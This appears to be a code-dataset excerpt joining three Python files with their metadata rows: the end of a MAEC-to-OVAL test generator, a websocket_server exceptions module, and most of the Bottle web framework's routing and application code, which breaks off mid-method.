oval_state_type = self.object_mappings.get(object_type).split('_')[0] + '_state'
oval_state_mappings = oval_state_type + '_mappings'
        oval_state = getattr(oval,oval_state_type)(version = 1, id = self.generate_ste_id())
object_fields = cybox_defined_object._fields
for element, value in object_fields.items():
if value is not None:
if element in getattr(getattr(self,oval_state_mappings),'keys')():
element_dictionary = getattr(getattr(self,oval_state_mappings),'get')(element)
element_name = element_dictionary.get('name')
element_datatype = element_dictionary.get('datatype')
method = 'set_' + element_name
getattr(oval_state,method)(oval.EntityBaseType(datatype = element_datatype, operation = self.operator_condition_mappings.get(value), valueOf_=value.value))
if oval_state.hasContent_():
return oval_state
#Create the OVAL test
def create_oval_test(self, object_type, oval_object, oval_entities, oval_states, reference = None):
oval_test_type = self.object_mappings.get(object_type).split('_')[0] + '_test'
#Create the test
comment = 'OVAL Test created from MAEC Action ' + reference
oval_test = getattr(oval,oval_test_type)(id = self.generate_test_id(), check = 'at least one', version=1.0, comment = comment)
oval_test.set_object(oval.ObjectRefType(object_ref = oval_object.get_id()))
if len(oval_states) > 0:
for state in oval_states:
if state is not None:
oval_test.add_state(oval.StateRefType(state_ref = state.get_id()))
return oval_test
#Handle any Values inside a Registry object
def process_registry_values(self, cybox_defined_object, oval_object, oval_states):
#Special registry Values handling
if cybox_defined_object.values is not None:
name_set = False
for reg_value in cybox_defined_object.values:
oval_state = oval.registry_state(version = 1, id = self.generate_ste_id())
for element, value in reg_value._fields.items():
if value is not None:
#Corner case for handling multiple name/value pairs in the OVAL object
if len(cybox_defined_object.values) == 1 and not name_set:
if element in self.registry_object_mappings.keys():
oval_element = self.registry_object_mappings.get(element)
method = 'set_' + oval_element.get('name')
getattr(oval_object,method)(oval.EntityBaseType(datatype = 'string', operation = self.operator_condition_mappings.get(value), valueOf_=value.value))
name_set = True
elif len(cybox_defined_object.values) > 1 and not name_set:
oval_object.set_name(oval.EntityBaseType(datatype = 'string', operation = 'pattern match', valueOf_='.*'))
name_set = True
if element in self.registry_state_mappings.keys():
oval_element = self.registry_state_mappings.get(element)
method = 'set_' + oval_element.get('name')
getattr(oval_state,method)(oval.EntityBaseType(datatype = 'string', operation = self.operator_condition_mappings.get(value), valueOf_=value.value))
if oval_state.hasContent_():
oval_states.append(oval_state)
def generate_test_id(self):
self.test_id_base += 1
test_id = 'oval:' + self.id_namespace + ':tst:' + str(self.test_id_base)
return test_id
def generate_obj_id(self):
self.obj_id_base += 1
obj_id = 'oval:' + self.id_namespace + ':obj:' + str(self.obj_id_base)
return obj_id
def generate_ste_id(self):
self.ste_id_base += 1
ste_id = 'oval:' + self.id_namespace + ':ste:' + str(self.ste_id_base)
return ste_id
def generate_def_id(self):
self.def_id_base += 1
def_id = 'oval:' + self.id_namespace + ':def:' + str(self.def_id_base)
return def_id
| bsd-3-clause | -8,493,995,175,343,858,000 | 58.37931 | 180 | 0.597425 | false |
CylonicRaider/websocket-server | websocket_server/exceptions.py | 1 | 1127 | # websocket_server -- WebSocket/HTTP server/client library
# https://github.com/CylonicRaider/websocket-server
"""
Exceptions.
"""
__all__ = ['WebSocketError', 'ProtocolError', 'InvalidDataError',
'ConnectionClosedError']
class WebSocketError(Exception):
"""
Base class for all exceptions.
"""
class ProtocolError(WebSocketError):
"""
    Exception for failure of the other side to adhere to the protocol.
The "code" attribute contains the error code (a CLOSE_* from the
constants module) or None.
"""
def __init__(self, message, code=None):
"""
__init__(message, code=None) -> None
Initialize a ProtocolError instance. message is passed to the
superclass constructor, code is stored in the same-named
attribute.
"""
WebSocketError.__init__(self, message)
self.code = code
class InvalidDataError(ProtocolError, ValueError):
"""
Invalid data have been encountered.
"""
class ConnectionClosedError(WebSocketError):
"""
Raised when trying to write a message after the connection closed.
"""
| mit | -2,971,920,080,136,131,600 | 25.209302 | 70 | 0.657498 | false |
enckse/system-viewer | bottle.py | 1 | 146747 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Bottle is a fast and simple micro-framework for small web applications. It
offers request dispatching (Routes) with url parameter support, templates,
a built-in HTTP Server and adapters for many third party WSGI/HTTP-server and
template engines - all in a single file and with no dependencies other than the
Python Standard Library.
Homepage and documentation: http://bottlepy.org/
Copyright (c) 2014, Marcel Hellkamp.
License: MIT (see LICENSE for details)
"""
from __future__ import with_statement
__author__ = 'Marcel Hellkamp'
__version__ = '0.13-dev'
__license__ = 'MIT'
# The gevent and eventlet server adapters need to patch some modules before
# they are imported. This is why we parse the commandline parameters here but
# handle them later
if __name__ == '__main__':
from optparse import OptionParser
_cmd_parser = OptionParser(usage="usage: %prog [options] package.module:app")
_opt = _cmd_parser.add_option
_opt("--version", action="store_true", help="show version number.")
_opt("-b", "--bind", metavar="ADDRESS", help="bind socket to ADDRESS.")
_opt("-s", "--server", default='wsgiref', help="use SERVER as backend.")
_opt("-p", "--plugin", action="append", help="install additional plugin/s.")
_opt("--debug", action="store_true", help="start server in debug mode.")
_opt("--reload", action="store_true", help="auto-reload on file changes.")
_cmd_options, _cmd_args = _cmd_parser.parse_args()
if _cmd_options.server:
if _cmd_options.server.startswith('gevent'):
import gevent.monkey; gevent.monkey.patch_all()
elif _cmd_options.server.startswith('eventlet'):
import eventlet; eventlet.monkey_patch()
import base64, cgi, email.utils, functools, hmac, imp, itertools, mimetypes,\
os, re, subprocess, sys, tempfile, threading, time, warnings
from datetime import date as datedate, datetime, timedelta
from tempfile import TemporaryFile
from traceback import format_exc, print_exc
from inspect import getargspec
from unicodedata import normalize
try: from simplejson import dumps as json_dumps, loads as json_lds
except ImportError: # pragma: no cover
try: from json import dumps as json_dumps, loads as json_lds
except ImportError:
try: from django.utils.simplejson import dumps as json_dumps, loads as json_lds
except ImportError:
def json_dumps(data):
raise ImportError("JSON support requires Python 2.6 or simplejson.")
json_lds = json_dumps
# We now try to fix 2.5/2.6/3.1/3.2 incompatibilities.
# It ain't pretty but it works... Sorry for the mess.
py = sys.version_info
py3k = py >= (3, 0, 0)
py25 = py < (2, 6, 0)
py31 = (3, 1, 0) <= py < (3, 2, 0)
# Workaround for the missing "as" keyword in py3k.
def _e(): return sys.exc_info()[1]
# Workaround for the "print is a keyword/function" Python 2/3 dilemma
# and a fallback for mod_wsgi (restricts stdout/err attribute access)
try:
_stdout, _stderr = sys.stdout.write, sys.stderr.write
except IOError:
_stdout = lambda x: sys.stdout.write(x)
_stderr = lambda x: sys.stderr.write(x)
# Lots of stdlib and builtin differences.
if py3k:
import http.client as httplib
import _thread as thread
from urllib.parse import urljoin, SplitResult as UrlSplitResult
from urllib.parse import urlencode, quote as urlquote, unquote as urlunquote
urlunquote = functools.partial(urlunquote, encoding='latin1')
from http.cookies import SimpleCookie
from collections import MutableMapping as DictMixin
import pickle
from io import BytesIO
from configparser import ConfigParser
basestring = str
unicode = str
json_loads = lambda s: json_lds(touni(s))
callable = lambda x: hasattr(x, '__call__')
imap = map
def _raise(*a): raise a[0](a[1]).with_traceback(a[2])
else: # 2.x
import httplib
import thread
from urlparse import urljoin, SplitResult as UrlSplitResult
from urllib import urlencode, quote as urlquote, unquote as urlunquote
from Cookie import SimpleCookie
from itertools import imap
import cPickle as pickle
from StringIO import StringIO as BytesIO
from ConfigParser import SafeConfigParser as ConfigParser
if py25:
msg = "Python 2.5 support may be dropped in future versions of Bottle."
warnings.warn(msg, DeprecationWarning)
from UserDict import DictMixin
def next(it): return it.next()
bytes = str
else: # 2.6, 2.7
from collections import MutableMapping as DictMixin
unicode = unicode
json_loads = json_lds
eval(compile('def _raise(*a): raise a[0], a[1], a[2]', '<py3fix>', 'exec'))
# Some helpers for string/byte handling
def tob(s, enc='utf8'):
return s.encode(enc) if isinstance(s, unicode) else bytes(s)
def touni(s, enc='utf8', err='strict'):
if isinstance(s, bytes):
return s.decode(enc, err)
else:
return unicode(s or ("" if s is None else s))
tonat = touni if py3k else tob
# 3.2 fixes cgi.FieldStorage to accept bytes (which makes a lot of sense).
# 3.1 needs a workaround.
if py31:
from io import TextIOWrapper
class NCTextIOWrapper(TextIOWrapper):
def close(self): pass # Keep wrapped buffer open.
# A bug in functools causes it to break if the wrapper is an instance method
def update_wrapper(wrapper, wrapped, *a, **ka):
try:
functools.update_wrapper(wrapper, wrapped, *a, **ka)
except AttributeError:
pass
# These helpers are used at module level and need to be defined first.
# And yes, I know PEP-8, but sometimes a lower-case classname makes more sense.
def depr(message, strict=False):
warnings.warn(message, DeprecationWarning, stacklevel=3)
def makelist(data): # This is just too handy
if isinstance(data, (tuple, list, set, dict)):
return list(data)
elif data:
return [data]
else:
return []
class DictProperty(object):
""" Property that maps to a key in a local dict-like attribute. """
def __init__(self, attr, key=None, read_only=False):
self.attr, self.key, self.read_only = attr, key, read_only
def __call__(self, func):
functools.update_wrapper(self, func, updated=[])
self.getter, self.key = func, self.key or func.__name__
return self
def __get__(self, obj, cls):
if obj is None: return self
key, storage = self.key, getattr(obj, self.attr)
if key not in storage: storage[key] = self.getter(obj)
return storage[key]
def __set__(self, obj, value):
if self.read_only: raise AttributeError("Read-Only property.")
getattr(obj, self.attr)[self.key] = value
def __delete__(self, obj):
if self.read_only: raise AttributeError("Read-Only property.")
del getattr(obj, self.attr)[self.key]
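# Typical use (sketch with illustrative names): cache a computed value under a
# key inside a dict-like attribute such as a WSGI environ. 'parse_qs' here is
# an assumed helper, not something imported by this module.
#
#   class Request(object):
#       def __init__(self, environ):
#           self.environ = environ
#       @DictProperty('environ', 'bottle.request.query', read_only=True)
#       def query(self):
#           return parse_qs(self.environ.get('QUERY_STRING', ''))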
class cached_property(object):
""" A property that is only computed once per instance and then replaces
itself with an ordinary attribute. Deleting the attribute resets the
property. """
def __init__(self, func):
self.__doc__ = getattr(func, '__doc__')
self.func = func
def __get__(self, obj, cls):
if obj is None: return self
value = obj.__dict__[self.func.__name__] = self.func(obj)
return value
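# Minimal illustration (names are made up): the wrapped method runs once per
# instance; its result is stored in the instance __dict__ and shadows the
# descriptor on later lookups.
#
#   class Page(object):
#       @cached_property
#       def rendered(self):
#           return expensive_render()   # runs only on first access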
class lazy_attribute(object):
""" A property that caches itself to the class object. """
def __init__(self, func):
functools.update_wrapper(self, func, updated=[])
self.getter = func
def __get__(self, obj, cls):
value = self.getter(cls)
setattr(cls, self.__name__, value)
return value
###############################################################################
# Exceptions and Events ########################################################
###############################################################################
class BottleException(Exception):
""" A base class for exceptions used by bottle. """
pass
###############################################################################
# Routing ######################################################################
###############################################################################
class RouteError(BottleException):
""" This is a base class for all routing related exceptions """
class RouteReset(BottleException):
""" If raised by a plugin or request handler, the route is reset and all
plugins are re-applied. """
class RouterUnknownModeError(RouteError): pass
class RouteSyntaxError(RouteError):
""" The route parser found something not supported by this router. """
class RouteBuildError(RouteError):
""" The route could not be built. """
def _re_flatten(p):
""" Turn all capturing groups in a regular expression pattern into
non-capturing groups. """
if '(' not in p:
return p
return re.sub(r'(\\*)(\(\?P<[^>]+>|\((?!\?))',
lambda m: m.group(0) if len(m.group(1)) % 2 else m.group(1) + '(?:', p)
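# For example (illustration): _re_flatten(r'(\d+)/(?P<name>\w+)') returns
# r'(?:\d+)/(?:\w+)' -- both capturing groups become non-capturing, so the
# pattern can be embedded in a larger regex without adding match groups.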
class Router(object):
""" A Router is an ordered collection of route->target pairs. It is used to
efficiently match WSGI requests against a number of routes and return
the first target that satisfies the request. The target may be anything,
usually a string, ID or callable object. A route consists of a path-rule
and a HTTP method.
The path-rule is either a static path (e.g. `/contact`) or a dynamic
path that contains wildcards (e.g. `/wiki/<page>`). The wildcard syntax
and details on the matching order are described in docs:`routing`.
"""
default_pattern = '[^/]+'
default_filter = 're'
#: The current CPython regexp implementation does not allow more
#: than 99 matching groups per regular expression.
_MAX_GROUPS_PER_PATTERN = 99
def __init__(self, strict=False):
self.rules = [] # All rules in order
self._groups = {} # index of regexes to find them in dyna_routes
self.builder = {} # Data structure for the url builder
self.static = {} # Search structure for static routes
self.dyna_routes = {}
self.dyna_regexes = {} # Search structure for dynamic routes
#: If true, static routes are no longer checked first.
self.strict_order = strict
self.filters = {
're': lambda conf:
(_re_flatten(conf or self.default_pattern), None, None),
'int': lambda conf: (r'-?\d+', int, lambda x: str(int(x))),
'float': lambda conf: (r'-?[\d.]+', float, lambda x: str(float(x))),
'path': lambda conf: (r'.+?', None, None)}
def add_filter(self, name, func):
""" Add a filter. The provided function is called with the configuration
string as parameter and must return a (regexp, to_python, to_url) tuple.
The first element is a string, the last two are callables or None. """
self.filters[name] = func
rule_syntax = re.compile('(\\\\*)'
'(?:(?::([a-zA-Z_][a-zA-Z_0-9]*)?()(?:#(.*?)#)?)'
'|(?:<([a-zA-Z_][a-zA-Z_0-9]*)?(?::([a-zA-Z_]*)'
'(?::((?:\\\\.|[^\\\\>]+)+)?)?)?>))')
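    # Token examples (illustrative): for the rule '/object/<id:int>' this syntax
    # yields the static prefix '/object/' plus a wildcard named 'id' using the
    # 'int' filter; the older ':name' form (e.g. '/user/:name') is matched by
    # the first alternative of the pattern above.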
def _itertokens(self, rule):
offset, prefix = 0, ''
for match in self.rule_syntax.finditer(rule):
prefix += rule[offset:match.start()]
g = match.groups()
if len(g[0])%2: # Escaped wildcard
prefix += match.group(0)[len(g[0]):]
offset = match.end()
continue
if prefix:
yield prefix, None, None
name, filtr, conf = g[4:7] if g[2] is None else g[1:4]
yield name, filtr or 'default', conf or None
offset, prefix = match.end(), ''
if offset <= len(rule) or prefix:
yield prefix+rule[offset:], None, None
def add(self, rule, method, target, name=None):
""" Add a new rule or replace the target for an existing rule. """
anons = 0 # Number of anonymous wildcards found
keys = [] # Names of keys
pattern = '' # Regular expression pattern with named groups
filters = [] # Lists of wildcard input filters
builder = [] # Data structure for the URL builder
is_static = True
for key, mode, conf in self._itertokens(rule):
if mode:
is_static = False
if mode == 'default': mode = self.default_filter
mask, in_filter, out_filter = self.filters[mode](conf)
if not key:
pattern += '(?:%s)' % mask
key = 'anon%d' % anons
anons += 1
else:
pattern += '(?P<%s>%s)' % (key, mask)
keys.append(key)
if in_filter: filters.append((key, in_filter))
builder.append((key, out_filter or str))
elif key:
pattern += re.escape(key)
builder.append((None, key))
self.builder[rule] = builder
if name: self.builder[name] = builder
if is_static and not self.strict_order:
self.static.setdefault(method, {})
self.static[method][self.build(rule)] = (target, None)
return
try:
re_pattern = re.compile('^(%s)$' % pattern)
re_match = re_pattern.match
except re.error:
raise RouteSyntaxError("Could not add Route: %s (%s)" % (rule, _e()))
if filters:
def getargs(path):
url_args = re_match(path).groupdict()
for name, wildcard_filter in filters:
try:
url_args[name] = wildcard_filter(url_args[name])
except ValueError:
raise HTTPError(400, 'Path has wrong format.')
return url_args
elif re_pattern.groupindex:
def getargs(path):
return re_match(path).groupdict()
else:
getargs = None
flatpat = _re_flatten(pattern)
whole_rule = (rule, flatpat, target, getargs)
if (flatpat, method) in self._groups:
if DEBUG:
msg = 'Route <%s %s> overwrites a previously defined route'
warnings.warn(msg % (method, rule), RuntimeWarning)
self.dyna_routes[method][self._groups[flatpat, method]] = whole_rule
else:
self.dyna_routes.setdefault(method, []).append(whole_rule)
self._groups[flatpat, method] = len(self.dyna_routes[method]) - 1
self._compile(method)
def _compile(self, method):
all_rules = self.dyna_routes[method]
comborules = self.dyna_regexes[method] = []
maxgroups = self._MAX_GROUPS_PER_PATTERN
for x in range(0, len(all_rules), maxgroups):
some = all_rules[x:x+maxgroups]
combined = (flatpat for (_, flatpat, _, _) in some)
combined = '|'.join('(^%s$)' % flatpat for flatpat in combined)
combined = re.compile(combined).match
rules = [(target, getargs) for (_, _, target, getargs) in some]
comborules.append((combined, rules))
def build(self, _name, *anons, **query):
""" Build an URL by filling the wildcards in a rule. """
builder = self.builder.get(_name)
if not builder: raise RouteBuildError("No route with that name.", _name)
try:
for i, value in enumerate(anons): query['anon%d'%i] = value
url = ''.join([f(query.pop(n)) if n else f for (n,f) in builder])
return url if not query else url+'?'+urlencode(query)
except KeyError:
raise RouteBuildError('Missing URL argument: %r' % _e().args[0])
def match(self, environ):
""" Return a (target, url_agrs) tuple or raise HTTPError(400/404/405). """
verb = environ['REQUEST_METHOD'].upper()
path = environ['PATH_INFO'] or '/'
if verb == 'HEAD':
methods = ['PROXY', verb, 'GET', 'ANY']
else:
methods = ['PROXY', verb, 'ANY']
for method in methods:
if method in self.static and path in self.static[method]:
target, getargs = self.static[method][path]
return target, getargs(path) if getargs else {}
elif method in self.dyna_regexes:
for combined, rules in self.dyna_regexes[method]:
match = combined(path)
if match:
target, getargs = rules[match.lastindex - 1]
return target, getargs(path) if getargs else {}
# No matching route found. Collect alternative methods for 405 response
allowed = set([])
nocheck = set(methods)
for method in set(self.static) - nocheck:
if path in self.static[method]:
allowed.add(method)
for method in set(self.dyna_regexes) - allowed - nocheck:
for combined, rules in self.dyna_regexes[method]:
match = combined(path)
if match:
allowed.add(method)
if allowed:
allow_header = ",".join(sorted(allowed))
raise HTTPError(405, "Method not allowed.", Allow=allow_header)
# No matching route and no alternative method found. We give up
raise HTTPError(404, "Not found: " + repr(path))
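# Illustrative sketch (not in the original source): using the Router directly.
# The target can be any object; Bottle itself stores Route instances here.
#
#     router = Router()
#     router.add('/hello/<name>', 'GET', target='hello-handler')
#     environ = {'REQUEST_METHOD': 'GET', 'PATH_INFO': '/hello/world'}
#     target, args = router.match(environ)   # -> ('hello-handler', {'name': 'world'})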
class Route(object):
""" This class wraps a route callback along with route specific metadata and
configuration and applies Plugins on demand. It is also responsible for
turning a URL path rule into a regular expression usable by the Router.
"""
def __init__(self, app, rule, method, callback, name=None,
plugins=None, skiplist=None, **config):
#: The application this route is installed to.
self.app = app
#: The path-rule string (e.g. ``/wiki/:page``).
self.rule = rule
#: The HTTP method as a string (e.g. ``GET``).
self.method = method
#: The original callback with no plugins applied. Useful for introspection.
self.callback = callback
#: The name of the route (if specified) or ``None``.
self.name = name or None
#: A list of route-specific plugins (see :meth:`Bottle.route`).
self.plugins = plugins or []
#: A list of plugins to not apply to this route (see :meth:`Bottle.route`).
self.skiplist = skiplist or []
#: Additional keyword arguments passed to the :meth:`Bottle.route`
#: decorator are stored in this dictionary. Used for route-specific
#: plugin configuration and meta-data.
self.config = ConfigDict().load_dict(config)
@cached_property
def call(self):
""" The route callback with all plugins applied. This property is
created on demand and then cached to speed up subsequent requests."""
return self._make_callback()
def reset(self):
""" Forget any cached values. The next time :attr:`call` is accessed,
all plugins are re-applied. """
self.__dict__.pop('call', None)
def prepare(self):
""" Do all on-demand work immediately (useful for debugging)."""
self.call
def all_plugins(self):
""" Yield all Plugins affecting this route. """
unique = set()
for p in reversed(self.app.plugins + self.plugins):
if True in self.skiplist: break
name = getattr(p, 'name', False)
if name and (name in self.skiplist or name in unique): continue
if p in self.skiplist or type(p) in self.skiplist: continue
if name: unique.add(name)
yield p
def _make_callback(self):
callback = self.callback
for plugin in self.all_plugins():
try:
if hasattr(plugin, 'apply'):
callback = plugin.apply(callback, self)
else:
callback = plugin(callback)
except RouteReset: # Try again with changed configuration.
return self._make_callback()
if callback is not self.callback:
update_wrapper(callback, self.callback)
return callback
def get_undecorated_callback(self):
""" Return the callback. If the callback is a decorated function, try to
recover the original function. """
func = self.callback
func = getattr(func, '__func__' if py3k else 'im_func', func)
closure_attr = '__closure__' if py3k else 'func_closure'
while hasattr(func, closure_attr) and getattr(func, closure_attr):
func = getattr(func, closure_attr)[0].cell_contents
return func
def get_callback_args(self):
""" Return a list of argument names the callback (most likely) accepts
as keyword arguments. If the callback is a decorated function, try
to recover the original function before inspection. """
return getargspec(self.get_undecorated_callback())[0]
def get_config(self, key, default=None):
""" Lookup a config field and return its value, first checking the
route.config, then route.app.config."""
for conf in (self.config, self.app.config):
if key in conf: return conf[key]
return default
def __repr__(self):
cb = self.get_undecorated_callback()
return '<%s %r %r>' % (self.method, self.rule, cb)
###############################################################################
# Application Object ###########################################################
###############################################################################
class Bottle(object):
""" Each Bottle object represents a single, distinct web application and
consists of routes, callbacks, plugins, resources and configuration.
Instances are callable WSGI applications.
:param catchall: If true (default), handle all exceptions. Turn off to
let debugging middleware handle exceptions.
"""
def __init__(self, catchall=True, autojson=True):
#: A :class:`ConfigDict` for app specific configuration.
self.config = ConfigDict()
self.config._on_change = functools.partial(self.trigger_hook, 'config')
self.config.meta_set('autojson', 'validate', bool)
self.config.meta_set('catchall', 'validate', bool)
self.config['catchall'] = catchall
self.config['autojson'] = autojson
#: A :class:`ResourceManager` for application files
self.resources = ResourceManager()
self.routes = [] # List of installed :class:`Route` instances.
self.router = Router() # Maps requests to :class:`Route` instances.
self.error_handler = {}
# Core plugins
self.plugins = [] # List of installed plugins.
if self.config['autojson']:
self.install(JSONPlugin())
self.install(TemplatePlugin())
#: If true, most exceptions are caught and returned as :exc:`HTTPError`
catchall = DictProperty('config', 'catchall')
__hook_names = 'before_request', 'after_request', 'app_reset', 'config'
__hook_reversed = 'after_request'
@cached_property
def _hooks(self):
return dict((name, []) for name in self.__hook_names)
def add_hook(self, name, func):
""" Attach a callback to a hook. Three hooks are currently implemented:
before_request
Executed once before each request. The request context is
available, but no routing has happened yet.
after_request
Executed once after each request regardless of its outcome.
app_reset
Called whenever :meth:`Bottle.reset` is called.
"""
if name in self.__hook_reversed:
self._hooks[name].insert(0, func)
else:
self._hooks[name].append(func)
def remove_hook(self, name, func):
""" Remove a callback from a hook. """
if name in self._hooks and func in self._hooks[name]:
self._hooks[name].remove(func)
return True
def trigger_hook(self, __name, *args, **kwargs):
""" Trigger a hook and return a list of results. """
return [hook(*args, **kwargs) for hook in self._hooks[__name][:]]
def hook(self, name):
""" Return a decorator that attaches a callback to a hook. See
:meth:`add_hook` for details."""
def decorator(func):
self.add_hook(name, func)
return func
return decorator
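# Example sketch (added for illustration): attaching request hooks. The names
# 'before_request' and 'after_request' are the hooks listed in add_hook() above.
#
#     app = Bottle()
#
#     @app.hook('before_request')
#     def strip_trailing_slash():
#         request.environ['PATH_INFO'] = request.environ['PATH_INFO'].rstrip('/')
#
#     @app.hook('after_request')
#     def add_header():
#         response.set_header('X-Powered-By', 'bottle')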
def mount(self, prefix, app, **options):
""" Mount an application (:class:`Bottle` or plain WSGI) to a specific
URL prefix. Example::
root_app.mount('/admin/', admin_app)
:param prefix: path prefix or `mount-point`. If it ends in a slash,
that slash is mandatory.
:param app: an instance of :class:`Bottle` or a WSGI application.
All other parameters are passed to the underlying :meth:`route` call.
"""
segments = [p for p in prefix.split('/') if p]
if not segments: raise ValueError('Empty path prefix.')
path_depth = len(segments)
def mountpoint_wrapper():
try:
request.path_shift(path_depth)
rs = HTTPResponse([])
def start_response(status, headerlist, exc_info=None):
if exc_info:
_raise(*exc_info)
rs.status = status
for name, value in headerlist: rs.add_header(name, value)
return rs.body.append
body = app(request.environ, start_response)
if body and rs.body: body = itertools.chain(rs.body, body)
rs.body = body or rs.body
return rs
finally:
request.path_shift(-path_depth)
options.setdefault('skip', True)
options.setdefault('method', 'PROXY')
options.setdefault('mountpoint', {'prefix': prefix, 'target': app})
options['callback'] = mountpoint_wrapper
self.route('/%s/<:re:.*>' % '/'.join(segments), **options)
if not prefix.endswith('/'):
self.route('/' + '/'.join(segments), **options)
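# Usage sketch (illustrative only): mounting a sub-application under a prefix.
#
#     root = Bottle()
#     admin = Bottle()
#
#     @admin.route('/dashboard')
#     def dashboard():
#         return 'admin area'
#
#     root.mount('/admin/', admin)   # GET /admin/dashboard is handled by `admin`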
def merge(self, routes):
""" Merge the routes of another :class:`Bottle` application or a list of
:class:`Route` objects into this application. The routes keep their
'owner', meaning that the :data:`Route.app` attribute is not
changed. """
if isinstance(routes, Bottle):
routes = routes.routes
for route in routes:
self.add_route(route)
def install(self, plugin):
""" Add a plugin to the list of plugins and prepare it for being
applied to all routes of this application. A plugin may be a simple
decorator or an object that implements the :class:`Plugin` API.
"""
if hasattr(plugin, 'setup'): plugin.setup(self)
if not callable(plugin) and not hasattr(plugin, 'apply'):
raise TypeError("Plugins must be callable or implement .apply()")
self.plugins.append(plugin)
self.reset()
return plugin
def uninstall(self, plugin):
""" Uninstall plugins. Pass an instance to remove a specific plugin, a type
object to remove all plugins that match that type, a string to remove
all plugins with a matching ``name`` attribute or ``True`` to remove all
plugins. Return the list of removed plugins. """
removed, remove = [], plugin
for i, plugin in list(enumerate(self.plugins))[::-1]:
if remove is True or remove is plugin or remove is type(plugin) \
or getattr(plugin, 'name', True) == remove:
removed.append(plugin)
del self.plugins[i]
if hasattr(plugin, 'close'): plugin.close()
if removed: self.reset()
return removed
def reset(self, route=None):
""" Reset all routes (force plugins to be re-applied) and clear all
caches. If an ID or route object is given, only that specific route
is affected. """
if route is None: routes = self.routes
elif isinstance(route, Route): routes = [route]
else: routes = [self.routes[route]]
for route in routes: route.reset()
if DEBUG:
for route in routes: route.prepare()
self.trigger_hook('app_reset')
def close(self):
""" Close the application and all installed plugins. """
for plugin in self.plugins:
if hasattr(plugin, 'close'): plugin.close()
def run(self, **kwargs):
""" Calls :func:`run` with the same parameters. """
run(self, **kwargs)
def match(self, environ):
""" Search for a matching route and return a (:class:`Route` , urlargs)
tuple. The second value is a dictionary with parameters extracted
from the URL. Raise :exc:`HTTPError` (404/405) on a non-match."""
return self.router.match(environ)
def get_url(self, routename, **kargs):
""" Return a string that matches a named route """
scriptname = request.environ.get('SCRIPT_NAME', '').strip('/') + '/'
location = self.router.build(routename, **kargs).lstrip('/')
return urljoin(urljoin('/', scriptname), location)
def add_route(self, route):
""" Add a route object, but do not change the :data:`Route.app`
attribute."""
self.routes.append(route)
self.router.add(route.rule, route.method, route, name=route.name)
if DEBUG: route.prepare()
def route(self, path=None, method='GET', callback=None, name=None,
apply=None, skip=None, **config):
""" A decorator to bind a function to a request URL. Example::
@app.route('/hello/:name')
def hello(name):
return 'Hello %s' % name
The ``:name`` part is a wildcard. See :class:`Router` for syntax
details.
:param path: Request path or a list of paths to listen to. If no
path is specified, it is automatically generated from the
signature of the function.
:param method: HTTP method (`GET`, `POST`, `PUT`, ...) or a list of
methods to listen to. (default: `GET`)
:param callback: An optional shortcut to avoid the decorator
syntax. ``route(..., callback=func)`` equals ``route(...)(func)``
:param name: The name for this route. (default: None)
:param apply: A decorator or plugin or a list of plugins. These are
applied to the route callback in addition to installed plugins.
:param skip: A list of plugins, plugin classes or names. Matching
plugins are not installed to this route. ``True`` skips all.
Any additional keyword arguments are stored as route-specific
configuration and passed to plugins (see :meth:`Plugin.apply`).
"""
if callable(path): path, callback = None, path
plugins = makelist(apply)
skiplist = makelist(skip)
def decorator(callback):
if isinstance(callback, basestring): callback = load(callback)
for rule in makelist(path) or yieldroutes(callback):
for verb in makelist(method):
verb = verb.upper()
route = Route(self, rule, verb, callback, name=name,
plugins=plugins, skiplist=skiplist, **config)
self.add_route(route)
return callback
return decorator(callback) if callback else decorator
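# Example sketch (not part of the original source): binding a callback with
# route(). The 'wiki' name makes the rule available to Bottle.get_url() and
# Router.build().
#
#     app = Bottle()
#
#     @app.route('/wiki/<page>', method=['GET', 'HEAD'], name='wiki')
#     def show_page(page):
#         return 'Page: %s' % page
#
#     # Non-decorator form, equivalent to the above for a single method:
#     # app.route('/wiki/<page>', 'GET', show_page)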
def get(self, path=None, method='GET', **options):
""" Equals :meth:`route`. """
return self.route(path, method, **options)
def post(self, path=None, method='POST', **options):
""" Equals :meth:`route` with a ``POST`` method parameter. """
return self.route(path, method, **options)
def put(self, path=None, method='PUT', **options):
""" Equals :meth:`route` with a ``PUT`` method parameter. """
return self.route(path, method, **options)
def delete(self, path=None, method='DELETE', **options):
""" Equals :meth:`route` with a ``DELETE`` method parameter. """
return self.route(path, method, **options)
def patch(self, path=None, method='PATCH', **options):
""" Equals :meth:`route` with a ``PATCH`` method parameter. """
return self.route(path, method, **options)
def error(self, code=500):
""" Decorator: Register an output handler for a HTTP error code"""
def wrapper(handler):
self.error_handler[int(code)] = handler
return handler
return wrapper
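# Illustrative sketch: registering a custom error page. The handler receives
# the HTTPError instance and its return value is cast like any other response body.
#
#     @app.error(404)
#     def not_found(error):
#         return 'Nothing here: %s' % error.body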
def default_error_handler(self, res):
return tob(template(ERROR_PAGE_TEMPLATE, e=res))
def _handle(self, environ):
path = environ['bottle.raw_path'] = environ['PATH_INFO']
if py3k:
try:
environ['PATH_INFO'] = path.encode('latin1').decode('utf8')
except UnicodeError:
return HTTPError(400, 'Invalid path string. Expected UTF-8')
try:
environ['bottle.app'] = self
request.bind(environ)
response.bind()
try:
self.trigger_hook('before_request')
route, args = self.router.match(environ)
environ['route.handle'] = route
environ['bottle.route'] = route
environ['route.url_args'] = args
return route.call(**args)
finally:
self.trigger_hook('after_request')
except HTTPResponse:
return _e()
except RouteReset:
route.reset()
return self._handle(environ)
except (KeyboardInterrupt, SystemExit, MemoryError):
raise
except Exception:
if not self.catchall: raise
stacktrace = format_exc()
environ['wsgi.errors'].write(stacktrace)
return HTTPError(500, "Internal Server Error", _e(), stacktrace)
def _cast(self, out, peek=None):
""" Try to convert the parameter into something WSGI compatible and set
correct HTTP headers when possible.
Support: False, str, unicode, dict, HTTPResponse, HTTPError, file-like,
iterable of strings and iterable of unicodes
"""
# Empty output is done here
if not out:
if 'Content-Length' not in response:
response['Content-Length'] = 0
return []
# Join lists of byte or unicode strings. Mixed lists are NOT supported
if isinstance(out, (tuple, list))\
and isinstance(out[0], (bytes, unicode)):
out = out[0][0:0].join(out) # b'abc'[0:0] -> b''
# Encode unicode strings
if isinstance(out, unicode):
out = out.encode(response.charset)
# Byte Strings are just returned
if isinstance(out, bytes):
if 'Content-Length' not in response:
response['Content-Length'] = len(out)
return [out]
# HTTPError or HTTPException (recursive, because they may wrap anything)
# TODO: Handle these explicitly in handle() or make them iterable.
if isinstance(out, HTTPError):
out.apply(response)
out = self.error_handler.get(out.status_code, self.default_error_handler)(out)
return self._cast(out)
if isinstance(out, HTTPResponse):
out.apply(response)
